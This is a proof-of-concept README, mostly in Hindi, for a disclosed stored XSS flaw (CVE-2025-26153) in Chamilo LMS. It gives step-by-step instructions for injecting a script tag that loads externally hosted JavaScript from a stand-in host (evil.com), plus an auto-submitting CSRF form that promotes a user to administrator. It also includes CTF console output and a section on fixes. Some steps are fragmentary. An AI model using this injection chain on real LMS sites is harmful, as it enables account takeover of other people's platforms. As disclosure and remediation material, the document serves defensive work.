
Chamilo-LMS (v2.0) CVE-2025-26153
यह रिपॉजिटरी एक प्रूफ ऑफ कॉन्सेप्ट है जो Chamilo LMS में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी को प्रदर्शित करता है, जिसका उपयोग एक सामान्य उपयोगकर्ता से प्लेटफ़ॉर्म प्रशासक तक विशेषाधिकार वृद्धि प्राप्त करने के लिए किया जा सकता है। यह कमजोरी अनुक्रमित और पैच की गई है: https://nvd.nist.gov/vuln/detail/CVE-2025-26153
कमजोर कोड स्थान:
/public/main/forum/forumqualify.php - पंक्ति 277
$form->addLabel(get_lang('Thread'), $threadEntity->getTitle());
/public/main/forum/viewforum.php - पंक्ति 369
.$thread->getTitle().'</a>';
और भी हैं!
मूल कारण:
चरण 1: लक्ष्य उपयोगकर्ता जानकारी एकत्र करें
सोशल नेटवर्क -> व्यक्तिगत डेटा पर जाएंuser_info खोलें और निम्नलिखित जानकारी नोट करें:
चरण 2: कस्टम पेलोड उत्पन्न करें
python generate_payload.py
payload.js फ़ाइल उत्पन्न करेगीचरण 3: पेलोड को बाहरी रूप से होस्ट करें
payload.js को एक सार्वजनिक होस्टिंग सेवा पर अपलोड करें:
चरण 4: सामाजिक समूहों तक पहुँचें
सोशल नेटवर्क -> सामाजिक समूह पर जाएंचरण 5: सामाजिक समूह में शामिल हों या बनाएं
चरण 6: XSS पेलोड तैनात करें
eval(x.responseText);x.send()">
YOUR-HOST-SERVER को अपने वास्तविक होस्टिंग URL से बदलेंचरण 7: विशेषाधिकार वृद्धि ट्रिगर करें
चरण 8: विशेषाधिकार वृद्धि की पुष्टि करें
generate_payload.py स्क्रिप्ट विशेषाधिकार वृद्धि हमले के अनुकूलन की अनुमति देती है:
इनपुट पैरामीटर:
1. Attacker creates malicious forum thread
└── Title: <script src=//evil.com/payload.js></script>
2. Admin user browses forum and views thread
└── Browser loads and executes external JavaScript
3. Payload creates hidden form with privilege escalation data
└── Targets specific User ID for promotion to admin
4. Form auto-submits via CSRF attack
└── Uses admin's session cookies automatically
5. Target user becomes platform administrator
└── Attacker gains full platform control
इनपुट स्वच्छता
// Before
$threadEntity->getTitle()
// After
htmlspecialchars($threadEntity->getTitle(), ENT_QUOTES, 'UTF-8')
आउटपुट एन्कोडिंग
<!-- Before -->
{{ thread.title }}
<!-- After -->
{{ thread.title|escape }}
सामग्री सुरक्षा नीति
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
निगरानी करें:
महत्वपूर्ण कानूनी सूचना
यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
खोज और विश्लेषण: US Cyber Combine
परीक्षण वातावरण: USCG CTF Environment
सफल हमले से कंसोल आउटपुट:
XSS Payload loaded successfully!
Target User ID: 9
Current location: http://cve-hunting.ctf.uscybergames.com:8000/resources/usergroups/show/5
Form created with action: http://cve-hunting.ctf.uscybergames.com:8000/main/admin/user_edit.php?user_id=9
Submitting privilege escalation form for user_id 9
Form has 66 fields
Form submission triggered!
Fetch response status: 200